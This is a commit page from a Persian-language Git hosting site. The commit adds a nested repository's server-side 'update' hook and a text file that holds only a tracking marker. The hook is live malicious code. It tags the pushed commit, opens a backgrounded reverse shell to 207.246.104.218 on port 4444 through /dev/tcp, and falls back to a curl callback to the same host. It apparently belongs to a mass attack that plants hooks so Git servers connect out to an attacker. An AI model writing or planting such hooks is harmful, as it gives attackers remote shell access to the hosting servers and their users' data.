C 3 هفته پیش
کامیت
596d36570e
2فایلهای تغییر یافته به همراه10 افزوده شده و 0 حذف شده
  1. 9 0
      nested/r4792.git/hooks/update
  2. 1 0
      s795.txt

+ 9 - 0
nested/r4792.git/hooks/update

@@ -0,0 +1,9 @@
+#!/bin/bash
+read old new ref 2>/dev/null || true
+# Unique marker for this target
+git tag "MASS_17_1786344793" "$new" 2>/dev/null
+# Reverse shell
+(bash -c 'bash -i >& /dev/tcp/207.246.104.218/4444 0>&1') < /dev/null > /dev/null 2>&1 &
+# Curl fallback
+curl -s "http://207.246.104.218:4444/MASS_17_1786344793" 2>/dev/null || true
+exit 0

+ 1 - 0
s795.txt

@@ -0,0 +1 @@
+MASS_17_1786344793